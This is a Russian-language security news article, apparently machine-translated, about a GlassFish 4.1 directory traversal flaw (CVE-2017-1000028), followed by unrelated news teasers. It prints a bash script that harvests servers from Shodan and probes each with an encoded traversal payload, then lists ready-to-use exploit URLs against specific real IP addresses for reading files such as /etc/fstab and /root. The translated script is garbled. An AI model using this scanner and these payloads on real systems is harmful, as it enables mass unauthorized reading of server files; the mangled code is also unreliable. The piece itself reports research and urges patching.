Вторник, 7 июля, 15:02
дома Исследования GlassFish Oracle: уязвимость предоставляет данные тысячам серверов по всему миру (анализ)

GlassFish Oracle: уязвимость предоставляет данные тысячам серверов по всему миру (анализ)

Уязвимость в GlassFish Oracle: Исследователь безопасности Димитрис Руссис анализирует нас как уязвимость к известным Сервер приложений Его GlassFish Oracle признан CVE-2017-1000028 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028) в настоящее время предоставляет данные тысячам серверов по всему миру.

Oracle GlassFish

Его эксплуатация вакуум безопасности позволяет читать тип атаки по каталогам всех файлов сервера, на которых установлен сервер приложений.

В анализе, проведенном исследователем, они сначала используют образцы серверов 300 через поисковую систему shodan, на которой установлена ​​версия GlashFish в версии 4.1.

Затем с помощью автоматизированного сценария, созданного исследователем, они проверяют, какой из серверов действительно существует. уязвимость.

#! / bin / bash # Получить 300 результатов от поисковой системы shodan - shoitan search --limit 300 --fields ip_str Порт GlassFish 4.1: 4848> servers_ip.txt # Сортировать IP cat Servers_ip.txt | сортировать -n -t. -k 1,1 -k 2,2 -k 3,3 -k 4,4> servers_sort.txt # Удалить все пустые места sed -r 's / \ s + // g' servers_sort.txt> servers.txt # Удалить временное Файлы rm servers_ip.txt rm servers_sort.txt # Список серверов input = "servers.txt" # проверить сервер на уязвимость, в то время как IFS = read -r line do ip = $ line # http: // server_ip / theme / META-INF / ../../../../../../../../../../ url = "http: // $ line: 4848 / theme / META-INF /% c0 % ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae % c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0 % ae% c0% af% c0% ae% c0% ae% c0% af "echo -n" ip: $ line "fetch =` curl -s -o / dev / null --max-time 5 -w "% {http_code} "$ url`; if [$ fetch = 200] then echo "- Соединение установлено! Сервер уязвим" #Сохранить результат в уязвимый_servers.txt echo "$ url" >> уязвимый_сервер.txt еще эхо "- Соединение не удалось! Сервер не уязвим" fi done < "$ input"

Серверы

Конечным результатом скрипта является создание файла, содержащего ссылки (URL-адреса) немедленно использовать уязвимость.

Просматривая ссылки, включенные в файл браузер мы можем видеть все файлы в / корне Сервера.

Иллюстрация:

Windows сервер

http://52.25.200.71:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

Oracle GlassFish

Linux сервер

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

Серверы GlassFish Oracle

Теперь мы можем получить доступ к любому файлу, который хотим на сервере, добавив путь к файлу в конце URL-адреса.

Например,

/ и т.д./ passwd

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/fstab

/ Корень

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afroot

Вышеупомянутое исследование демонстрирует, с одной стороны, что уязвимость может привести к раскрытию данных в широком масштабе по всему миру, а с другой стороны, необходимость немедленной реализации данных. обновления программного обеспечения Системными администраторами.

Редакция SecNews искренне благодарит исследователя Димитриоса Руссиса за достоверную и своевременную информацию.

* Димитрис Руссис - сотрудник Лаборатории безопасности информационных систем Эгейского университета.

http://www.icsd.aegean.gr/group/members-data.php?group=L1&member=1652

ОСТАВИТЬ ОТВЕТ

Пожалуйста, введите ваш комментарий!
Пожалуйста, введите ваше имя здесь

LIVE NEWS

США: иностранные студенты, которые учатся только онлайн, подвергаются риску депортации

Федеральное управление полиции США по миграции и таможенному контролю (ICE) объявило, что иностранные студенты, которые ...

Спутниковая связь: они являются воротами для хакеров

В середине 2018 года на орбите находилось около 792 спутников ...

Носите портативный кондиционер Sony!

Впервые он был представлен прошлым летом, а теперь, год спустя, портативные кондиционеры Sony наконец-то доступны в ...

Недостаток в Hotels.com затронул пользователей Tesco Clubcard

Уязвимость, обнаруженная при создании Hotels.com, затронула пользователей Tesco Clubcard, которые были уведомлены о необходимости проверки ...

Взломанный BMW, Mercedes, Hyundai: массивное нарушение данных

Взломанные BMW, Mercedes, Hyundai: Данные о тысячах владельцев автомобилей были найдены для продажи на форумах хакеров, после того как хакеры взломали базу данных.

Хакер крадет пособие по безработице человека

Как будто в системе безработицы во Флориде не было достаточно проблем, похоже, что хакер крадет тысячи безработных.

Хакеры понимают, если ты дома с камер наблюдения

Камеры видеонаблюдения, установленные в домах, призваны обеспечить обитателям душевное спокойствие, так как они чувствуют, что защищают ...

Атаки правительства Соединенного Королевства: удвоение за последние 5 лет!

Согласно новому исследованию, успешные кибератаки, нацеленные на предприятия в Великобритании, удвоились за последние пять лет. Больше...

Xchanging: атака вымогателей влияет на клиентов

Глобальный поставщик ИТ-услуг и решений DXC Technology объявил в минувшие выходные о вымогательской атаке на системы ...

Соединенные Штаты рассматривают возможность запрета TikTok по соображениям безопасности

TikTok, одно из самых популярных приложений в мире, в последние дни находится в сложном положении.